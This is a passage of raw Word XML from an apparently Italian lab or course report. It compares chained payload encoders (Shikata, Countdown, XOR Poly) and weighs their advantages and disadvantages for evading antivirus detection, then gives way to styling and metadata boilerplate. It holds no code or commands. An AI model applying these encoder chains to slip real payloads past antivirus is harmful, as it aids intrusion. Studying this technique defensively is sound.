        <w:t>V2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778FA">
        <w:t xml:space="preserve"> (Shikata → Countdown → Shikata)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1B4718" w14:textId="77777777" w:rsidR="00A778FA" w:rsidRPr="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vantaggi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778FA">
        <w:t>: il codice diventa molto “contorto” e muta parecchio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C497E5C" w14:textId="77777777" w:rsidR="00A778FA" w:rsidRPr="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Svantaggi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778FA">
        <w:t>: usare due volte lo stesso metodo (Shikata) rischia di creare schemi ripetuti che un antivirus può imparare a riconoscere; inoltre il file cresce di più e diventa più pesante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22485A29" w14:textId="43D6F130" w:rsidR="00A778FA" w:rsidRPr="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A778FA">
        <w:t>(Shikata → Countdown → XOR Poly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB2E29" w14:textId="68FC1A34" w:rsidR="00A778FA" w:rsidRPr="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vantaggi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: tre metodi diversi che lavorano insieme → più varietà, più polimorfismo, meno prevedibilità. Il file resta di dimensioni moderate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86A1ED" w14:textId="77777777" w:rsidR="00A778FA" w:rsidRPr="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Svantaggi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: leggermente più complesso da generare e, se usato male, rischia di non essere stabile al 100%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15802897" w14:textId="0AD2972F" w:rsidR="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02546F1D" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705C4942" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2632C284" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C40628" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B40638" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71314D82" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAC3DDC" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39636894" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364BCD01" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637EA14F" w14:textId="77777777" w:rsidR="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB2DD0E" w14:textId="77215CDE" w:rsidR="00A311EF" w:rsidRPr="00A311EF" w:rsidRDefault="00A311EF" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Starvaggi Simone</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311EF" w:rsidRPr="00A311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36D64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3FA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21AD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B53A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15985"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B8018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7C66E84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B801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1F7343D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A5A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70423E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89E47E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72712409">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="355272270">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1571958591">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="541596566">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1317341892">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="147989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64"/>
    <w:rsid w:val="00240364"/>
    <w:rsid w:val="00295CAE"/>
    <w:rsid w:val="003B7126"/>
    <w:rsid w:val="00624C32"/>
    <w:rsid w:val="006D41F2"/>
    <w:rsid w:val="007C65EC"/>
    <w:rsid w:val="00965051"/>
    <w:rsid w:val="00A311EF"/>
    <w:rsid w:val="00A778FA"/>
    <w:rsid w:val="00CA6988"/>
    <w:rsid w:val="00D57A4A"/>
    <w:rsid w:val="00F344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48AF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A2C64325-7DE8-401E-9353-36A7F3C9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403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2403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240364"/>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240364"/>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240364"/>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24036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4036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4036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4036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40364"/>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24036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240364"/>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240364"/>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240364"/>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24036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4036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4036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40364"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0024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4036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4036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4036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4036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40364"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00240364"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00240364"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="002403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240364"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00240364"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormaleWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A778FA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasigrassetto">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A778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551</Words>
  <Characters>3147</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Gioco Mt2</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Gioco Mt2</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-08T11:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-08T13:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>